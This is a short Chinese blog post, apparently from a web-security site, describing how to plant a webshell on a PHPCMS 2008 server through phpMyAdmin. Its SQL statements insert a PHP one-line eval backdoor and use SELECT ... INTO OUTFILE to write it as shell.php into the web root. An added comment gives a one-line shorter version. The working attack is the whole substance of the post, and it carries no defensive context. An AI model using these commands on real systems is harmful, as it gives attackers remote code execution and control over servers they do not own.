Posted by 小拳头
进去后
SQL代码
- Create TABLE b (cmd text NOT NULL);
SQL代码
- Insert INTO b (cmd) VALUES('<?php @eval($_POST[cmd]);?>');
//在字段cmd中插入一句话木马,木马内容为
PHP代码
- <?php @eval($_POST[cmd]);?>
前3句都尅执行成功最后一句执行后显示空白
SQL代码
- select cmd from b into outfile 'E:\wwwroot\phpcms\phpcms\shell.php';
Tr4c3注:很早以前在phpmyadmin得webshell的方法,这样写太冗繁了,用下面的一句就可以了。
SELECT "<?eval($_POST[cmd]);" INTO OUTFILE 'E:\\wwwroot\\phpcms\\phpcms\\shell.php';
本作品采用知识共享署名-非商业性使用-相同方式共享 2.5 中国大陆许可协议进行许可。
请大家帮忙:行文措辞难免有错,请大家在阅读时发现错误通过评论方式告诉我。谢谢大家
请大家帮忙:行文措辞难免有错,请大家在阅读时发现错误通过评论方式告诉我。谢谢大家
原创文章如转载,请注明:转载自Web安全手册 [ http://www.pcsec.org/ ]
本文链接地址:http://www.pcsec.org/archives/how-to-get-phpcms2008-webshell.html
网站 / Web安全手册 http://www.pcsec.org/
